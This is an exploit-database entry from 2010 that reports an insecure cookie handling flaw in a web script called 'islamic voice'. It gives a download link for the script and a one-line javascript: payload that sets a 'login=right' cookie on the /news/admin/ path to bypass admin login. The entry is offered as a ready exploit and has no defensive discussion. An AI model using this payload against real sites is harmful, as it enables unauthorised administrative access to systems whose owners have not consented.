id: 9693
date: 03/19/2010
title: islamic voice insecure Cookie Handling Vulnerability
author: JiKo
cves: 

====================================================
islamic voice insecure Cookie Handling Vulnerability 
====================================================

----------[exploit Debut]
[ insecure cookie handling vulnerability ]
----------[Script Info]

Moi    : JIKO
Site    : No-exploit.Com

----------[Script Info]

Script        : islamic voice
Download    : http://www.fileflyer.com/view/9WQZeAo
            ||
          http://www.fileflyer.com/view/9WQZeAo

----------[exploit Info]

1]~[ICH]
javascript:document.cookie="login=right;path=/news/admin/";
----------[exploit Fin]



#  0day.today [2023-03-24]  #